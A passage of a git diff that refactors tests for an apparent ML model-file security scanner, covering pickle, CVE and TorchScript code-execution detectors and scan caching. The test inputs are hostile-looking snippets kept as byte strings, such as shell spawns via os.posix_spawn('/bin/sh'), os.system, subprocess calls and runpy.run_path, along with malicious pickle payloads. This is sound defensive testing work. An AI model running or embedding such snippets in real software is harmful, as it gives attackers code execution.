"status": "failed"}], - "issues": [], - "scan_count": calls["count"], - } - - first = scan(str(file_path), config) - second = scan(str(file_path), config) - - assert first["scan_count"] == 1 - assert second["scan_count"] == 2 - assert calls["count"] == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + _assert_uncached_missing_package(tmp_path, "Memory-mapped scan error: invalid mapping") def test_cached_scan_persists_deterministic_validation_findings(tmp_path: Path) -> None: @@ -5741,27 +5594,7 @@ def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: def test_cached_scan_does_not_persist_missing_associated_weights(tmp_path: Path) -> None: - file_path = _make_cacheable_file(tmp_path) - cache_dir = tmp_path / "cache" - config = {"cache_enabled": True, "cache_dir": str(cache_dir)} - calls = {"count": 0} - - @cached_scan() - def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: - calls["count"] += 1 - return { - "checks": [], - "issues": [{"message": "Associated .bin weights file not found", "severity": "warning"}], - "scan_count": calls["count"], - } - - first = scan(str(file_path), config) - second = scan(str(file_path), config) - - assert first["scan_count"] == 1 - assert second["scan_count"] == 2 - assert calls["count"] == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + _assert_uncached_os_error(tmp_path, "Associated .bin weights file not found") def test_configuration_extractor_rebuilds_cached_config_after_mutation() -> None: @@ -5851,22 +5684,7 @@ def test_batch_lookup_rejects_transient_clean_hash_for_malicious_final_bytes( file_path.write_bytes(malicious_payload) os.utime(file_path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) - original_hash = cache.hasher.hash_file_with_stat - raced = False - - def hash_transient_clean_bytes(path: str, file_stat: os.stat_result) -> str: - nonlocal raced - if raced: - return original_hash(path, file_stat) - raced = True - Path(path).write_bytes(clean_payload) - os.utime(path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) - clean_hash = original_hash(path, Path(path).stat()) - Path(path).write_bytes(malicious_payload) - os.utime(path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) - return clean_hash - - monkeypatch.setattr(cache.hasher, "hash_file_with_stat", hash_transient_clean_bytes) + _inject_transient_clean_hash(monkeypatch, cache, clean_payload, malicious_payload, original_stat) cached_results = batch_ops.batch_lookup([str(file_path)], version_context=version_context) @@ -5913,15 +5731,7 @@ def test_batch_store_skips_operational_failures(tmp_path: Path, monkeypatch: pyt cache_manager = get_cache_manager(str(cache_dir), enabled=True) assert cache_manager.cache is not None file_identity = cache_manager.cache.capture_file_identity(str(file_path)) - release_calls = 0 - original_release = cache_manager.cache.release_ancestor_identity - - def release_identity(identity: AncestorIdentity | None) -> None: - nonlocal release_calls - release_calls += 1 - original_release(identity) - - monkeypatch.setattr(cache_manager.cache, "release_ancestor_identity", release_identity) + release_calls = _count_identity_releases(monkeypatch, cache_manager.cache) batch_ops = BatchCacheOperations(cache_manager) stored_count = batch_ops.batch_store( @@ -5943,7 +5753,7 @@ def release_identity(identity: AncestorIdentity | None) -> None: assert stored_count == 0 assert cache_manager.get_stats()["total_entries"] == 0 - assert release_calls == 1 + assert release_calls[0] == 1 def test_batch_store_skips_results_without_scanned_identity(tmp_path: Path) -> None: @@ -6496,3 +6306,87 @@ def test_same_size_rewrite_with_restored_mtime_invalidates_cache(tmp_path: Path) cached_result = cache.get_cached_result(str(file_path), version_context=version_context) assert cached_result is None + + +def _inject_transient_clean_hash( + monkeypatch: pytest.MonkeyPatch, + cache: ScanResultsCache, + clean_payload: bytes, + malicious_payload: bytes, + original_stat: os.stat_result, +) -> None: + original_hash = cache.hasher.hash_file_with_stat + raced = False + + def hash_transient_clean_bytes(path: str, file_stat: os.stat_result) -> str: + nonlocal raced + if raced: + return original_hash(path, file_stat) + raced = True + Path(path).write_bytes(clean_payload) + os.utime(path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) + clean_hash = original_hash(path, Path(path).stat()) + Path(path).write_bytes(malicious_payload) + os.utime(path, ns=(original_stat.st_atime_ns, original_stat.st_mtime_ns)) + return clean_hash + + monkeypatch.setattr(cache.hasher, "hash_file_with_stat", hash_transient_clean_bytes) + + +def _count_scan(calls: dict[str, int], path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: + assert config is not None + calls["count"] += 1 + return {"call_count": calls["count"], "timeout": config["timeout"]} + + +def _assert_uncached_os_error(tmp_path: Path, case_message: str) -> None: + file_path = _make_cacheable_file(tmp_path) + cache_dir = tmp_path / "cache" + config = {"cache_enabled": True, "cache_dir": str(cache_dir)} + calls = {"count": 0} + + @cached_scan() + def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: + calls["count"] += 1 + return { + "checks": [], + "issues": [{"message": case_message, "severity": "warning"}], + "scan_count": calls["count"], + } + + first = scan(str(file_path), config) + second = scan(str(file_path), config) + + assert first["scan_count"] == 1 + assert second["scan_count"] == 2 + assert calls["count"] == 2 + assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + + +def _assert_uncached_missing_package(tmp_path: Path, case_message: str) -> None: + file_path = _make_cacheable_file(tmp_path) + cache_dir = tmp_path / "cache" + config = {"cache_enabled": True, "cache_dir": str(cache_dir)} + calls = {"count": 0} + + @cached_scan() + def scan(path: str, config: dict[str, Any] | None = None) -> dict[str, Any]: + calls["count"] += 1 + return { + "checks": [ + { + "message": case_message, + "status": "failed", + } + ], + "issues": [], + "scan_count": calls["count"], + } + + first = scan(str(file_path), config) + second = scan(str(file_path), config) + + assert first["scan_count"] == 1 + assert second["scan_count"] == 2 + assert calls["count"] == 2 + assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 diff --git a/tests/conftest.py b/tests/conftest.py index af710eb84..cb0707546 100644 --- a/tests/conftest.py +++ b/tests/conftest.py @@ -704,19 +704,11 @@ def mock_cli_scan_command(): yield mock_scan -@pytest.fixture(autouse=True) -def cleanup_test_files(): - """Ensure test temp files are cleaned up after each test. - - Tests should use tmp_path for any temporary files; - pytest handles tmp_path cleanup automatically. - """ - yield - - # ============================================================================= # Common file creation fixtures # ============================================================================= +# Tests should use tmp_path for temporary files; +# pytest handles tmp_path cleanup automatically. @pytest.fixture def safe_pickle_file(tmp_path): """Create a safe pickle file for testing.""" diff --git a/tests/detectors/test_compile_eval_variants.py b/tests/detectors/test_compile_eval_variants.py index 369bb8864..eff21f7a4 100644 --- a/tests/detectors/test_compile_eval_variants.py +++ b/tests/detectors/test_compile_eval_variants.py @@ -56,63 +56,29 @@ def test_compile_detection(self): def test_globals_detection(self): """Test detection of globals() function.""" - scanner = PickleScanner() - # Create a pickle with globals() reference - pickle_bytes = b"\x80\x02cbuiltins\nglobals\nq\x00." - - with tempfile.NamedTemporaryFile(suffix=".pkl", delete=False) as f: - f.write(pickle_bytes) - temp_path = f.name - - try: - result = scanner.scan(temp_path) - - # Should detect as dangerous - assert len(result.issues) > 0, "Should detect globals()" - - # Check that globals was detected in patterns - pattern_detected = False - for issue in result.issues: - if "globals" in issue.message.lower(): - pattern_detected = True - assert issue.severity == IssueSeverity.CRITICAL, "globals should be CRITICAL" - break - - assert pattern_detected, "Should detect globals pattern" - - finally: - os.unlink(temp_path) + # Should detect as dangerous + # Check that globals was detected in patterns + _assert_critical_builtin_pickle( + (b"\x80\x02cbuiltins\nglobals\nq\x00."), + ("Should detect globals()"), + ("globals"), + ("globals should be CRITICAL"), + ("Should detect globals pattern"), + ) def test_locals_detection(self): """Test detection of locals() function.""" - scanner = PickleScanner() - # Create a pickle with locals() reference - pickle_bytes = b"\x80\x02cbuiltins\nlocals\nq\x00." - - with tempfile.NamedTemporaryFile(suffix=".pkl", delete=False) as f: - f.write(pickle_bytes) - temp_path = f.name - - try: - result = scanner.scan(temp_path) - - # Should detect as dangerous - assert len(result.issues) > 0, "Should detect locals()" - - # Check that locals was detected - pattern_detected = False - for issue in result.issues: - if "locals" in issue.message.lower(): - pattern_detected = True - assert issue.severity == IssueSeverity.CRITICAL, "locals should be CRITICAL" - break - - assert pattern_detected, "Should detect locals pattern" - - finally: - os.unlink(temp_path) + # Should detect as dangerous + # Check that locals was detected + _assert_critical_builtin_pickle( + (b"\x80\x02cbuiltins\nlocals\nq\x00."), + ("Should detect locals()"), + ("locals"), + ("locals should be CRITICAL"), + ("Should detect locals pattern"), + ) def test_builtins_access_detection(self): """Test detection of __builtins__ access.""" @@ -348,3 +314,36 @@ def __reduce__(self, func=dangerous_func): finally: os.unlink(temp_path) + + +def _assert_critical_builtin_pickle( + case_pickle_bytes: bytes, + case_nonempty_message: str, + case_pattern: str, + case_severity_message: str, + case_pattern_message: str, +) -> None: + scanner = PickleScanner() + + pickle_bytes = case_pickle_bytes + + with tempfile.NamedTemporaryFile(suffix=".pkl", delete=False) as f: + f.write(pickle_bytes) + temp_path = f.name + + try: + result = scanner.scan(temp_path) + + assert len(result.issues) > 0, case_nonempty_message + + pattern_detected = False + for issue in result.issues: + if case_pattern in issue.message.lower(): + pattern_detected = True + assert issue.severity == IssueSeverity.CRITICAL, case_severity_message + break + + assert pattern_detected, case_pattern_message + + finally: + os.unlink(temp_path) diff --git a/tests/detectors/test_cve_detection.py b/tests/detectors/test_cve_detection.py index 6f935b770..827395468 100644 --- a/tests/detectors/test_cve_detection.py +++ b/tests/detectors/test_cve_detection.py @@ -134,18 +134,8 @@ def test_detect_cve_2024_34997_basic_pattern(self, tmp_path): test_file = tmp_path / "numpy_wrapper_attack.pkl" test_file.write_bytes(malicious_content) - result = scan_file(str(test_file)) - # Should detect CVE-2024-34997 patterns - cve_detections = [ - issue - for issue in result.issues - if "CVE-2024-34997" in issue.message or "CVE-2024-34997" in str(issue.details) - ] - - assert len(cve_detections) > 0, ( - f"Should detect CVE-2024-34997. Issues found: {[i.message for i in result.issues]}" - ) + _assert_cve_file(test_file, "CVE-2024-34997", "Should detect CVE-2024-34997. Issues found: ") def test_detect_cve_2024_34997_cache_exploitation(self, tmp_path): """Test detection of NumpyArrayWrapper cache exploitation.""" @@ -479,18 +469,8 @@ def test_detect_cve_2026_24747_basic_pattern(self, tmp_path: Path) -> None: test_file = tmp_path / "setitem_attack.pkl" test_file.write_bytes(malicious_content) - result = scan_file(str(test_file)) - # Should detect CVE-2026-24747 patterns via CVE attribution system - cve_detections = [ - issue - for issue in result.issues - if "CVE-2026-24747" in issue.message or "CVE-2026-24747" in str(issue.details) - ] - - assert len(cve_detections) > 0, ( - f"Should detect CVE-2026-24747. Issues found: {[i.message for i in result.issues]}" - ) + _assert_cve_file(test_file, "CVE-2026-24747", "Should detect CVE-2026-24747. Issues found: ") def test_detect_cve_2026_24747_setitem_after_rebuild(self, tmp_path: Path) -> None: """Test detection of SETITEMS applied after tensor reconstruction.""" @@ -935,5 +915,11 @@ def test_cve_detection_with_existing_scanners(): assert hasattr(pickle_scanner, "_analyze_cve_patterns"), "PickleScanner should have CVE analysis" +def _assert_cve_file(test_file: Path, cve_id: str, failure_prefix: str) -> None: + result = scan_file(str(test_file)) + cve_detections = [issue for issue in result.issues if cve_id in issue.message or cve_id in str(issue.details)] + assert len(cve_detections) > 0, f"{failure_prefix}{[i.message for i in result.issues]}" + + if __name__ == "__main__": pytest.main([__file__, "-v"]) diff --git a/tests/detectors/test_jit_script_detector.py b/tests/detectors/test_jit_script_detector.py index 249c03c3e..cedbd019d 100644 --- a/tests/detectors/test_jit_script_detector.py +++ b/tests/detectors/test_jit_script_detector.py @@ -33,6 +33,103 @@ def __len__(self) -> int: return len(self._aliases) +def _assert_typed_call_detected(source: bytes, expected_pattern: str) -> None: + detector = JITScriptDetector() + + findings = detector.scan_model(source, "pytorch", "payload.py") + + assert any(finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings) + + +def _assert_late_alias_rebind_detection(late_state: bytes, expect_finding: bool) -> None: + detector = JITScriptDetector() + leading_blocks = b"".join( + f"def benign_{index}():\n return {index}\n}}\x00".encode() + for index in range(jit_script_module._MAX_DEFAULT_EMBEDDED_PYTHON_SNIPPETS + 2) + ) + padding_line = b"# pad\n" + padding = padding_line * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8) + source = b"\x00\xff" + leading_blocks + b"from runpy import run_path as runner\n" + padding + late_state + padding + + findings = detector.scan_model(source, "pytorch", "payload.bin") + has_dynamic_finding = any( + f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + ) + + assert has_dynamic_finding is expect_finding + + +def _assert_eval_builtin_detected(data: bytes) -> None: + detector = JITScriptDetector() + + findings = detector.scan_model(data, "pytorch", "payload.bin") + + assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + + +def _assert_typed_member_detected(source: bytes, expected_pattern: str) -> None: + findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") + + assert any(finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings) + + +def _assert_late_typed_member_detected(prefix: bytes, late_state: bytes, expected_pattern: str) -> None: + detector = JITScriptDetector() + padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) + source = b"\x00\xff" + prefix + padding + late_state + padding + + findings = detector.scan_model(source, "pytorch", "payload.bin") + + assert any(finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings) + + +def _assert_eval_body_detected(body: str) -> None: + detector = JITScriptDetector() + data = f"\x00\xffdef payload(value):\n {body}\n".encode() + + findings = detector.scan_model(data, "pytorch", "payload.bin") + + assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + + +def _assert_no_critical_builtin_findings(data: bytes) -> None: + detector = JITScriptDetector() + + findings = detector.scan_model(data, "pytorch", "payload.bin") + + assert not any(finding.type == "dangerous_builtin" for finding in findings) + assert not any(finding.severity == "CRITICAL" for finding in findings) + + +def _assert_late_runpy_alias_detected(late_state: bytes) -> None: + detector = JITScriptDetector() + padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) + source = b"\x00\xffimport runpy as rp\n" + padding + late_state + padding + + findings = detector.scan_model(source, "pytorch", "payload.bin") + + assert any( + f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + ) + + +def _assert_no_dangerous_builtin(data: bytes) -> None: + detector = JITScriptDetector() + + findings = detector.scan_model(data, "pytorch", "payload.bin") + + assert not any(finding.type == "dangerous_builtin" for finding in findings) + + +def _assert_benign_body_no_builtin(body: str) -> None: + detector = JITScriptDetector() + data = f"\x00\xffdef benign(value):\n {body}\n".encode() + + findings = detector.scan_model(data, "pytorch", "payload.bin") + + assert not any(finding.type == "dangerous_builtin" for finding in findings) + + class TestJITScriptDetector: """Test the JITScriptDetector class.""" @@ -664,11 +761,7 @@ def test_scan_model_ignores_binary_framed_string_literal_os_process_launch(self) detector = JITScriptDetector() source = b"\x00\xffdef payload():\n return \"os.posix_spawn('/bin/sh', ['sh'], {})\"\n}" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "OS command execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "OS command execution detected") def test_scan_model_ignores_string_literal_os_process_launch_with_unrelated_risk(self) -> None: detector = JITScriptDetector() @@ -679,11 +772,7 @@ def test_scan_model_ignores_string_literal_os_process_launch_with_unrelated_risk b" return \"os.posix_spawn('/bin/sh', ['sh'], {})\"\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "OS command execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "OS command execution detected") @pytest.mark.parametrize( "source", @@ -722,11 +811,7 @@ def test_scan_model_detects_embedded_snippet_alias_aware_os_process_launch(self) b"}" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "OS command execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "OS command execution detected") def test_scan_model_detects_embedded_snippet_alias_aware_os_process_launch_before_binary_tail(self) -> None: detector = JITScriptDetector() @@ -737,11 +822,7 @@ def test_scan_model_detects_embedded_snippet_alias_aware_os_process_launch_befor b"\x00\xffMODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "OS command execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "OS command execution detected") def test_scan_model_detects_framed_module_import_alias_aware_os_process_launch(self) -> None: detector = JITScriptDetector() @@ -749,21 +830,13 @@ def test_scan_model_detects_framed_module_import_alias_aware_os_process_launch(s b"\x00\xffimport os\ndef payload():\n return getattr(os, 'posix_' + 'spawn')('/bin/sh', ['sh'], {})\n}" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "OS command execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "OS command execution detected") def test_scan_model_allows_framed_benign_dict_literal_os_accessor(self) -> None: detector = JITScriptDetector() source = b"\x00\xffdef payload():\n import os\n return {'cwd': getattr(os, 'getcwd')()}\n}" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "OS command execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "OS command execution detected") @pytest.mark.parametrize( "source", @@ -804,21 +877,13 @@ def test_scan_model_ignores_string_literal_asyncio_subprocess_launch_with_unrela b" return \"asyncio.create_subprocess_shell('id')\"\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Subprocess execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Subprocess execution detected") def test_scan_model_ignores_binary_framed_string_literal_asyncio_subprocess_launch(self) -> None: detector = JITScriptDetector() source = b"\x00\xffdef payload():\n return \"asyncio.create_subprocess_shell('id')\"\n\x00\xffMODEL-FRAMING" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Subprocess execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Subprocess execution detected") def test_scan_model_ignores_lossy_decoded_string_literal_asyncio_subprocess_launch(self) -> None: detector = JITScriptDetector() @@ -829,11 +894,7 @@ def test_scan_model_ignores_lossy_decoded_string_literal_asyncio_subprocess_laun + b"\n return \"asyncio.create_subprocess_shell('id')\"\n\x00\xffMODEL-FRAMING" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Subprocess execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Subprocess execution detected") def test_parse_embedded_python_snippet_caps_trim_attempts(self, monkeypatch: pytest.MonkeyPatch) -> None: parse_calls = 0 @@ -862,22 +923,14 @@ def test_scan_model_detects_binary_framed_long_tail_alias_aware_asyncio_subproce b"\x00" + tail ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Subprocess execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Subprocess execution detected") def test_scan_model_detects_binary_framed_long_tail_alias_aware_os_process_launch(self) -> None: detector = JITScriptDetector() tail = b"\n".join(b"tail" for _ in range(jit_script_module._MAX_SNIPPET_PARSE_TRIM_ATTEMPTS + 20)) source = b"\x00\xffdef payload():\n import os as o\n return getattr(o, 'system')('id')\n\x00" + tail - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "OS command execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "OS command execution detected") def test_scan_model_preserves_raw_asyncio_match_in_unparsed_snippet_after_benign_parse(self) -> None: detector = JITScriptDetector() @@ -890,11 +943,7 @@ def test_scan_model_preserves_raw_asyncio_match_in_unparsed_snippet_after_benign b"asyncio.create_subprocess_shell('id')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Subprocess execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Subprocess execution detected") def test_scan_model_detects_embedded_snippet_alias_aware_asyncio_subprocess_launch(self) -> None: detector = JITScriptDetector() @@ -905,11 +954,7 @@ def test_scan_model_detects_embedded_snippet_alias_aware_asyncio_subprocess_laun b"}" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Subprocess execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Subprocess execution detected") @pytest.mark.parametrize( "source", @@ -947,11 +992,7 @@ def test_scan_model_ignores_runpy_member_after_module_alias_rebind(self) -> None b" return rp.run_path([])\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_preserves_possible_runpy_execution_after_conditional_replacement(self) -> None: detector = JITScriptDetector() @@ -959,31 +1000,19 @@ def test_scan_model_preserves_possible_runpy_execution_after_conditional_replace b"def payload():\n if replace:\n runpy.run_path = len\n return runpy.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_binary_prefixed_aliased_runpy_execution(self) -> None: detector = JITScriptDetector() source = b"\x00\xffdef payload():\n from runpy import run_path as run\n return run('payload.py')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_binary_framed_top_level_runpy_execution(self) -> None: detector = JITScriptDetector() source = b"\x00\xfffrom runpy import run_path as run\nrun('payload.py')\n\x00MODEL-FRAMING" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_tail_window_runpy_execution(self) -> None: detector = JITScriptDetector() @@ -1003,22 +1032,14 @@ def test_scan_model_detects_late_priority_runpy_snippet_after_harmless_imports(s leading_imports = b"".join(f"import harmless_{index}\n\x00".encode() for index in range(12)) source = b"\x00\xff" + leading_imports + b"from runpy import run_path as run\nrun('payload.py')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_late_priority_runpy_import_list_alias(self) -> None: detector = JITScriptDetector() leading_imports = b"".join(f"import harmless_{index}\n\x00".encode() for index in range(12)) source = b"\x00\xff" + leading_imports + b"import harmless as h, runpy as rp\nrp.run_path('payload.py')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_late_priority_runpy_continued_import_list_alias(self) -> None: detector = JITScriptDetector() @@ -1027,11 +1048,7 @@ def test_scan_model_detects_late_priority_runpy_continued_import_list_alias(self b"\x00\xff" + leading_imports + b"import harmless as h, \\\n runpy as rp\nrp.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") @pytest.mark.parametrize( "continued_import", @@ -1076,18 +1093,8 @@ def test_scan_model_detects_late_priority_runpy_import_after_large_function_prea ) def test_scan_model_reports_tail_runpy_after_prefix_overwrite_across_gap(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy\n" - b"runpy.run_path = len\n" + filler + b"def payload():\n return runpy.run_path([])\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffimport runpy\nrunpy.run_path = len\n"), (b"def payload():\n return runpy.run_path([])\n") ) def test_scan_model_reports_tail_runpy_when_omitted_middle_may_restore_overwrite(self) -> None: @@ -1103,11 +1110,7 @@ def test_scan_model_reports_tail_runpy_when_omitted_middle_may_restore_overwrite + b"def payload():\n return runpy.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_reports_tail_runpy_when_safe_middle_state_is_omitted(self) -> None: detector = JITScriptDetector() @@ -1121,52 +1124,21 @@ def test_scan_model_reports_tail_runpy_when_safe_middle_state_is_omitted(self) - + b"def payload():\n return runpy.run_path([])\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_tail_runpy_alias_from_framed_prefix_import_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = b"\x00\xffimport runpy as rp\n" + filler + b"def payload():\n return rp.run_path('payload.py')\n" - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffimport runpy as rp\n"), (b"def payload():\n return rp.run_path('payload.py')\n") ) def test_scan_model_detects_tail_alias_call_with_comment_parenthesis_in_prefix_import(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy as rp # (\n" + filler + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffimport runpy as rp # (\n"), (b"def payload():\n return rp.run_path('payload.py')\n") ) def test_scan_model_detects_tail_alias_call_with_string_parenthesis_in_prefix_import(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b'\x00\xffimport runpy as rp; marker = "("\n' - + filler - + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b'\x00\xffimport runpy as rp; marker = "("\n'), (b"def payload():\n return rp.run_path('payload.py')\n") ) def test_scan_model_detects_deep_priority_import_in_function_context(self) -> None: @@ -1206,11 +1178,7 @@ def test_scan_model_detects_late_priority_alias_call_after_import_window(self) - ) source = b"\x00\xff" + leading_blocks + b"import runpy as rp\n" + padding + b"rp.run_path('payload.py')\n" - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_does_not_report_safe_late_priority_overwrite_from_compact_span(self) -> None: detector = JITScriptDetector() @@ -1256,11 +1224,7 @@ def test_scan_model_ignores_late_priority_alias_use_inside_multiline_string(self b" return 1\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_late_rebound_alias_call_after_priority_window(self) -> None: detector = JITScriptDetector() @@ -1277,11 +1241,7 @@ def test_scan_model_detects_late_rebound_alias_call_after_priority_window(self) b"rp.run_path('payload')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_preserves_raw_runpy_call_between_compact_priority_segments(self) -> None: detector = JITScriptDetector() @@ -1345,11 +1305,7 @@ def test_scan_model_detects_late_assignment_alias_call_after_priority_window(sel b"\x00\xff" + leading_blocks + b"import runpy\nrun = runpy.run_path\n" + padding + b"run('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_pattern(detector, source, "payload.bin", 